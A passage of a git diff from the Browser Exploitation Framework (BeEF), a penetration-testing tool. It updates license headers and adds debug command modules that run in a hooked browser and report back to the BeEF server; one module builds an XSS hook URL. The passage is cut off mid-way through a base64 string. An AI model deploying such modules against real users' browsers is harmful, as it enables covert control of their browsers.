23d222c17..837f3b413 100755 --- a/modules/chrome_extensions/screenshot/config.yaml +++ b/modules/chrome_extensions/screenshot/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/screenshot/module.rb b/modules/chrome_extensions/screenshot/module.rb index 75849d756..0663bffbd 100755 --- a/modules/chrome_extensions/screenshot/module.rb +++ b/modules/chrome_extensions/screenshot/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Screenshot < BeEF::Core::Command diff --git a/modules/chrome_extensions/send_gvoice_sms/command.js b/modules/chrome_extensions/send_gvoice_sms/command.js index 279b56c76..6d8082fdd 100755 --- a/modules/chrome_extensions/send_gvoice_sms/command.js +++ b/modules/chrome_extensions/send_gvoice_sms/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var to = "<%= @to %>"; var message = "<%= @message %>"; diff --git a/modules/chrome_extensions/send_gvoice_sms/config.yaml b/modules/chrome_extensions/send_gvoice_sms/config.yaml index e8e99a730..07e32b8e9 100755 --- a/modules/chrome_extensions/send_gvoice_sms/config.yaml +++ b/modules/chrome_extensions/send_gvoice_sms/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/send_gvoice_sms/module.rb b/modules/chrome_extensions/send_gvoice_sms/module.rb index a692f861c..99eea8418 100755 --- a/modules/chrome_extensions/send_gvoice_sms/module.rb +++ b/modules/chrome_extensions/send_gvoice_sms/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Send_gvoice_sms < BeEF::Core::Command diff --git a/modules/debug/test_beef_debug/command.js b/modules/debug/test_beef_debug/command.js new file mode 100644 index 000000000..4737ae211 --- /dev/null +++ b/modules/debug/test_beef_debug/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + try { + var msg = "<%= @msg.gsub(/"/, '\\"') %>"; + beef.debug(msg); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.'); + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message); + } + +}); diff --git a/modules/debug/test_beef_debug/config.yaml b/modules/debug/test_beef_debug/config.yaml new file mode 100644 index 000000000..f077e3b4f --- /dev/null +++ b/modules/debug/test_beef_debug/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + test_beef_debug: + enable: true + category: "Debug" + name: "Test beef.debug()" + description: "Test the 'beef.debug()' function. This function wraps 'console.log()'" + authors: ["bcoles"] + target: + working: ["All"] + not_working: ["IE"] diff --git a/modules/debug/test_beef_debug/module.rb b/modules/debug/test_beef_debug/module.rb new file mode 100644 index 000000000..239272875 --- /dev/null +++ b/modules/debug/test_beef_debug/module.rb @@ -0,0 +1,20 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Test_beef_debug < BeEF::Core::Command + + def self.options + return [ + {'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' } + ] + end + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end + +end diff --git a/modules/debug/test_cors_request/command.js b/modules/debug/test_cors_request/command.js new file mode 100644 index 000000000..8ef5044d9 --- /dev/null +++ b/modules/debug/test_cors_request/command.js @@ -0,0 +1,16 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var method = "<%= @method %>"; + var url = "<%= @url %>"; + var data = "<%= @data %>"; + + beef.net.cors.request(method, url, data, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); }); + +}); + diff --git a/modules/debug/test_cors_request/config.yaml b/modules/debug/test_cors_request/config.yaml new file mode 100644 index 000000000..ec961b554 --- /dev/null +++ b/modules/debug/test_cors_request/config.yaml @@ -0,0 +1,28 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + test_cors_request: + enable: true + category: "Debug" + name: "Test CORS Request" + description: "Test the beef.net.cors.request function by retrieving a URL." + authors: ["bcoles"] + target: + working: ["ALL"] + not_working: + IE: + min_ver: 6 + max_ver: 7 + O: + min_ver: 1 + max_ver: 11 + C: + min_ver: 1 + max_ver: 2 + S: + min_ver: 1 + max_ver: 3 diff --git a/modules/debug/test_cors_request/module.rb b/modules/debug/test_cors_request/module.rb new file mode 100644 index 000000000..569963dfe --- /dev/null +++ b/modules/debug/test_cors_request/module.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Test_cors_request < BeEF::Core::Command + + def post_execute + content = {} + content['response'] = @datastore['response'] + save content + end + + def self.options + + return [ + {'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' }, + {'name' => 'url', 'ui_label' =>'URL', 'type' => 'text', 'width' => '400px', 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' }, + {'name' => 'data', 'ui_label' =>'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' }, + ] + end + +end diff --git a/modules/debug/test_http_bind_raw/command.js b/modules/debug/test_http_bind_raw/command.js new file mode 100644 index 000000000..5339386e7 --- /dev/null +++ b/modules/debug/test_http_bind_raw/command.js @@ -0,0 +1,11 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /beef'); + +}); diff --git a/modules/debug/test_http_bind_raw/config.yaml b/modules/debug/test_http_bind_raw/config.yaml new file mode 100644 index 000000000..8c4561ce3 --- /dev/null +++ b/modules/debug/test_http_bind_raw/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + test_http_bind_raw: + enable: true + category: "Debug" + name: "Test HTTP Bind Raw" + description: "Test the HTTP 'bind_raw' handler." + authors: ["bcoles"] + target: + working: ["All"] diff --git a/modules/debug/test_http_bind_raw/module.rb b/modules/debug/test_http_bind_raw/module.rb new file mode 100644 index 000000000..75d2bbb82 --- /dev/null +++ b/modules/debug/test_http_bind_raw/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Test_http_bind_raw < BeEF::Core::Command + + def pre_send + configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + xss_hook_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html','beef'=>xss_hook_url}, 'hello world!', '/beef', -1) + end + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end + +end diff --git a/modules/debug/test_http_redirect/command.js b/modules/debug/test_http_redirect/command.js new file mode 100644 index 000000000..c1f8d8f53 --- /dev/null +++ b/modules/debug/test_http_redirect/command.js @@ -0,0 +1,11 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /redirect'); + +}); diff --git a/modules/debug/test_http_redirect/config.yaml b/modules/debug/test_http_redirect/config.yaml new file mode 100644 index 000000000..5eaf0aa11 --- /dev/null +++ b/modules/debug/test_http_redirect/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + test_http_redirect: + enable: true + category: "Debug" + name: "Test HTTP Redirect" + description: "Test the HTTP 'redirect' handler." + authors: ["bcoles"] + target: + working: ["All"] diff --git a/modules/debug/test_http_redirect/module.rb b/modules/debug/test_http_redirect/module.rb new file mode 100644 index 000000000..49caa7613 --- /dev/null +++ b/modules/debug/test_http_redirect/module.rb @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Test_http_redirect < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_redirect('http://beefproject.com', '/redirect') + end + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end + +end diff --git a/modules/debug/test_network_request/command.js b/modules/debug/test_network_request/command.js index 1e298d835..6bc4371b4 100644 --- a/modules/debug/test_network_request/command.js +++ b/modules/debug/test_network_request/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var scheme = "<%= @scheme %>"; diff --git a/modules/debug/test_network_request/config.yaml b/modules/debug/test_network_request/config.yaml index f753bf17c..3d214575d 100644 --- a/modules/debug/test_network_request/config.yaml +++ b/modules/debug/test_network_request/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb index e4de490dd..a464ab1f2 100644 --- a/modules/debug/test_network_request/module.rb +++ b/modules/debug/test_network_request/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Test_network_request < BeEF::Core::Command diff --git a/modules/debug/test_return_ascii_chars/command.js b/modules/debug/test_return_ascii_chars/command.js index e19a1ea91..03d6d1e0b 100644 --- a/modules/debug/test_return_ascii_chars/command.js +++ b/modules/debug/test_return_ascii_chars/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var str = ''; diff --git a/modules/debug/test_return_ascii_chars/config.yaml b/modules/debug/test_return_ascii_chars/config.yaml index 64eff01e8..60f1b7afe 100644 --- a/modules/debug/test_return_ascii_chars/config.yaml +++ b/modules/debug/test_return_ascii_chars/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/debug/test_return_ascii_chars/module.rb b/modules/debug/test_return_ascii_chars/module.rb index 1f4b40690..c79a986d3 100644 --- a/modules/debug/test_return_ascii_chars/module.rb +++ b/modules/debug/test_return_ascii_chars/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Test_return_ascii_chars < BeEF::Core::Command diff --git a/modules/debug/test_return_image/command.js b/modules/debug/test_return_image/command.js new file mode 100644 index 000000000..788dbac2f --- /dev/null +++ b/modules/debug/test_return_image/command.js @@ -0,0 +1,12 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "image=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAACVCAYAAAAdSLW3AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAMT1JREFUeNrsXQd8VFX2/qZkUiaFhCQkoYTeIfQuSBNBelMsiGt3resWd9VddV1d9Y+sgrordkVAadJ7M6GDdEJogRCSEEJ6JpmZzPzPue9NSK+TMIF7/F1JZt5MZt673zvnO1Wvb9ACUopID1rTab0iT4UUrTwFJWQyrb/Q6i9PhRQJkKJioDVJ/fltWm7ylEiASLkhvWi1t9vt/PMwWk/LUyIBIuWGDOBzotNoYbdaAQ3eUDmJFAkQKSSdrbl5ePjBaWjRohmsZos/PfYJLW95aiRApADNkJuLu4YPxmt/eREgsJD0o/WBPDUSIFKAEP5fjsmEhx+YipGjR8CamcWm1lP08Mvy9EiA3O6ih0aD1NR08cunH72D0GZNYDUJTfI+rZnyFEmA3M6SBa0WF+PixS+tWzbHJwQSrU4Lq9XK5+ozWmPlaZIAuV3lCnQ6HDtxquCBSePuxr/e+itgNsNms3nRQ4tojZOnSgLkdpSzcNPjZPRZJCYlFzz4yh+ewQsvPg1bVjbsdrtRBcmD8nTd+qLTevjLs3BDwjRa7YSM66m4Y1A/tG/bquCJUSOHIDk9E/t27gaByE2j0UykhzNo7ZGnTQLkdhETbfxHbbl5btC7YerEMQVPaOi/MXcNRUpmFvYSSOw6HWFJezc9FUhrMy2bPH0SILe6XKN1t02na3aZiPqUifegYUCDGyDRKCDRe3lg25YdxEnsROB1faAkNm6hlSlPoQTIrS4BpBnuyiEzy8vXByOG3lHigMED+6JVm5bYtHkHcomXaN3cWtLD99E6KXiMFEnSb2H5iVYKvDwx/8sFOH3mXKkHPXjvJGxaswgdu3aENSOTyXtjengNrXdpecjTKDXIrSpMvJuQFumbTVokLTsHk8ePLvXAJo1Dce+U8UhIuY4jBw7DZrdrtHrdIChu4CO0LsvTKQFyKwqbSQ/BTe9x5OgJ9O4ZgbatW5Z6oBdpmsnj70az8KbYvfcgspJToDEYQoivcNSdkxz30jLLUyoBcivJdd77tMmH2MwWHDx8DNMmj4O30avMF3SP6Iypk8YiNiERp46cIG1C51avGwilQpFD89HytEqA3ErCJtJErZs+MDkuHompaUJTlCf+Dfxw39TxCG/ZHPsOHkFG0lXAzS2QgHYvPd2b1glaSfLUSoDcCpJL6yKtGWQyCY4RGByIPr26VfjC7l07Yca0icjMy8NR0j5WUy40bvq2BJSH6ekgFXxZ8hRLgNR3iaEVTBu7t02rwfYdu9Cnd3e0ahFe4Qt9fIwYN3qEiMjHxF7CpTPn2exyI7OL60tmFtJSFnmaXVc0su1PhcJEexutXtbcXIQ2DsXWtT8VSUOpSMxmM778bjH++d5HSDh3ERriMjq9jp86Tes9Wj9IoEgNUl+FPVD7aE3T6vVeGckpiNx7AJPGjy5B2i0WCzIys+DpUTQMotPp0LtHBB64dxLyYMeRI8dhycoms0vwkwl0CPuR2SV8Tp5uCZD6KEysL9CarDUYtAkXLmIfbfKpk+6Bu8FQBAjn6bnI3fsRGtIIHh7uRVWRt1Gkqoy+axguJiThzKkY2PJtIOCF0dMP0BqogiROnnIJkPomnEaSQ+surbs7LkSfwfGYc5hwz11wc7vRPis4KBDZOSa888E8WPPz0aFd6xJvFBbaiLTJRLTv0BbHCCTJly5z8iO0Wm1LlZ+0o3UcHNGXIgFSj2QXlOzdPlp3A6IPH8OxmLOYMHYUgURfBAARXTrijXfnYMHi5ehKPzcKDixK/jQadO7YDrMemAodmWS/0XvlpqVzKr2OnutKh8xirk/rEBSPmhQJkHohG2l1oNWJNUn0oSO4EJ+AsaNHQK8QbyEN/HwxbeI9+HXXPjz53Cu4lpKK7hGd4ONtLPJm7gS0YUMGYOK4u5GUmoYTx0/BRlxG6+bG9hlnSt5PK43WMVp2efolQFxdeJOupcUBkTYaAsnR/YdxODoG48eMgKEQJ9Hr9cIE8/Pzwdt//xe+WbQMdtIcXUhzFOcnQYEBmD55LHoSmT/OFY3EZbj8V6PV+tHTTOTvhBJovCIvgQSIq4tF1SSDyBxqqjG44fRvbG6dw3gChMFQtKVv/z49ENGzO5YvW4k1y5djydrt8PX1RkfiIEzsC0u7Ni0x84EpcPf2xv6Dh5Gbnsm5XdAA4So/YbOLqxhlfpcEiEsLE/bVtAYKkJBGOH34OI7S3X+i4CRFQdKhbSvccccAbNq5F7GnTuKXVZuw6dfdaNYkFK1aNi9yrIFeO2RQPwG2c5fjcfZ4NGwEEa1Ox0SHPV3joQQZpbdLAsSlJZvWKqFJgKbMSU4fPYG9vx0X3Rm9i/GNZk3CMOzOQdiwYzfSUq4jPu4KFpLZdfhkjCDswUENixzPHjGuOwkm0r977yFwERdrKwJksKpNrLSi5GWQAHF1TfILrcHgOhIi3eeOn8SuA4cxdszIEsHEkEZBGD/2LmzduRtXE5Kg9fTAyd+O4rvFy5CemYWe3brA0/NGoJG9XZxuz4HJ42fO48LJ00xumJuwbTZc5UJb1M8hRQLEZUHCmoTzrMK1ZG5dijmPrVF7MGLYYAT4+xU5mLN+hw0dhFXrtiD12jXofbyRl2dG1NadWLJmE4IaBgiNwuBwSMMAf9w/fQJH37Erai+sFiu0imu5vWpy7YTMFHa6yFws5woT6AVQG8txKW67Lh2xask3aNO65Hk+fPQkJk57BBcvXoLeizSN3Q7O94LNhnGTxuK9t14h7lIy0Lh6/RY8/vQfkXj5CvQ3zLirUOrit8nLIDWIqwp7lpbQ4tSRHqxJki8nYNP2SNw14k6hBYqbW3379sTylRuQTWBijaBl84lWNBH+BT//AgPxGjaxtNob7QO4uvHuu4Yiav8hcNoLu5pJ1zBSeDrWQVrn5aWQAHFV4f5YK2mJQB8T96t0p1dAMqQESJo2DkXv3t2wcs1G5GRnKwAh00rrYYApJxcbVm/AroNH0L9vjyKvZQI/ZcIYIvinifOccoDEXTW3mLhfkpdCAsSVhYmzwQGSZALJxm2RdOcvqUlahDdFh/ZtSJOsFxnBWjU2wk2zOQZy7kQ0fly6Co2bhKFrp/YFrzMavTBx/CgcjT6DmCPHwX8HSkeVEVCCmTKXSwLEpWVrgSahjc6lu7sOHsakCaNh9PIsciDXl/BUq+W/rBWheodJxTydPWPZmVlYtmwNklPTMGzwgILcL84m5lyww6diEEOcho8lYa8AN7PjFkYyj0sCxOU1CWfpRvAdPv7MecRfvYYphdqaOqRr5w4wEuneuG4zJy0W8WIJ04s0yr4du7CDuMfQwf2FN4yFI/dj7h6GbVF7EXcu1gES5kE8EOgXeQkkQFxddkDxbAXRLR9HSYuENQ1Dz+5dSxw4oF8vxCdexUHa7Npi+VoKN3FHLJlUqzZuw6ABfRAW0kg8x0VaQ4cMxAriMmkpqQJQUGIkXFd/WF6C6ol089adcPufpfyDNS8PzcKbYf/O1SWi5yxZ2TkYMXYG9kbtgd5oLPXNrDkmNAwOxIKv52EUkX+HMEAm3fsoOI7IHAZKy6GBKlCkSA3issJ9sUaBo+10d09NSEJQaCMM7NerxIFsMkV07YiFS1Yh12wu4uItMLmIe2SnZ2Dl6o3oFtEZbVq1KOAy6emZ2L0jykHafWnxRV4hL4EEiKvLINXsgS0/H9kmE343874iXMMhjUNDkJ9vwzYypVROUQpI9DBlm7ByzQZ0J3OttZr0yHGTFes3Izkp2WFqRahcSLp+qyiyeXXdSUdaNzrPkZY4f/EyEhKvlvmCF37/O7Tt0kGYZKWKHdB7uiMzMwszH31edIBkYTfyK398llFYYErT+pO8BBIgripM0Dk1PqQQ/ePBoKQl8st8ka+PD555/GHAYi37nRkkRNCTE5PwEIEkPiFRPDxj6gR0791DSV1RhDun9JKXQgLEVc5rG1p0G8evqv1f1BtiMaNpWIiIiJcnPOUqhEdRlwcSEs7lOvXbMTz70mvid65YfOTB6YXBxQUqs+SlkQCpE+4GJfeJ24g2U+/MrCVeovUVrf20jtKaq/KOIufZZrMBeWY8QvzDvQx+UcBFCESi3am54gJCna8PVixZiQ/nzhe/Txw3CsFFwTVWJexSKil6eQpKCNvrPupGYh8sD8ZpCiXwFqqCgh8PUJe/eneulHCfXrKt8MTzT+DZJx+u1Gu4Q8rKZasq/uBM9t3d8c9352D0qKEiE3jwoL5YsmiZCDxCKdtlwK6Sl7nyAOkJZWgMl2/ebmkJjdRNw31EOcmpnaoRuGKPbR9fFTBVFrvdXqAt7BYLt10UhU7tO3fAq396TlQKVlb8SDNUtp+Jnsh/WlIy3vjnbCz+/jOMHnEnlvy4tPAhoyRAqgaQt1TvylnVNGB7eR2UctJbSfgu30G9IXCeUg9VOwRX19QUphL/y2Cw0conU8ZKpJuJN7tXabN6e3ujTavm6N2zm2gNxC1+iudhVSSnTtOl0VYep1pvI5auWItdew6gV48IuDfwJQvN4mgQESG3fdUA8iWtMaSf29rM5rZ053tAZzBwm02etfc1lLrn+iq8+e9QbwBcEtscSoZteU4hUbCkaAA77PSzVsclrjp6zIZ8drny4pY8Hh5wMxhEwiBv+qZNwtCMbP4W4U3QnP7l4F27tq1E3UfhFqVVkcysbETRRuex1JUGiFYLa042/j37Uyz8Zh6CAwMRFxcvPrN6DthMTJbbv3IA2cA3KavZ3KFH967IyspCzPFTLfTe3p/T4zz45XeoXwEm5g93QamuG6byhLLsIMUEoo3PP9tt+dDQJnJz94LenTa/hxe8/ANhSktBemKc0BJ9+/fG8DsHCa3AG9/f1xcNAxsiKKghvAkkxdv41FS+/G4Roo+fgr6KWkdLx2/YuhMno88gvFljxF285KBKYar5KAFSSYCwKbUD+bYO3G5m3bLv8ewfX8e6X9ZB5+09nHjfdihFOMdd/LuwW3UWlE6Ezcs0i8gM4ig2GywMBg9vP3j4BcAYEAyfoDABCH7M3ccPnj4NkJ12DXu+/wj2fBtmv/8m/vDc43X2hbZsj8Lf33hfmGpVFdYi5vQMLF66kgDSBJH5toKnIKfwVtmLtVlrcHtq/6GjQqWvXfotHnr8Rfzw5QJ2HbYgkKxV78quOGePUzdeoDWdlldJJWGDzWoVJpOOzBSjfxC8g8PQIKw5/EKawqtBQ3j4+BdU8hVwC7tiXp3Y8BNMCXGYM/cDvPjsY3X2pRYuWYknn/0zXY8s0mbu1XsTet2GzTvQggf+FNVsIXLrVw0gJ2hzmPNzsg2/7t6HiC4d8PVns4UN/sNXP0Lv68NuTm5GMBLKgEtXENYSr9J6sPgdkcFgs1oEOAye3gho2hr+TVuhYbM28A4KgbvRV6lE4uNIm7BplW8xF/MGeeDiwZ24emQPJs2YXmfgiL14WTS9/u67xbATMa82OFSP1plzsbh2PQ3aolooQ279qgEkjgByHtb89qdjlBku3Ij584/fQ2JiMjav28ytadjrw6h55CZ/ZgbD87ReQbGgF292Bgbzh4bhbRHcpgsCW7Yn86kRbRZ3MpPoeZu1BBiKCxNyU2YaTkeuhzEoGG+++nKtf6kTp2Lw+dc/4vuFS0Wmr9ZohE6rqfH78giGq1eTC8p4Hdxfbv2qAYR5SDyhoj0PgHEINzD74tMPcOddUxAbe4lzftjG56zQH27S5+1D6zMoLtobwCATije+l19DhHTojtAOPch8agYdgcKWbxFDaqx5pkr/ER1xsfh9e5CXcAGP/eFFdClUB+5M4bypTVsjBU/YvnMXclPTofH0FH2ynCVsNmqKgiNdapCqA4TlItupVxKvisYBjt6y4U0b4z//909MnP6IsM2J/L0JJU5Slw0BmFjybfytwuaUjUwjHhXgE9wYTSP6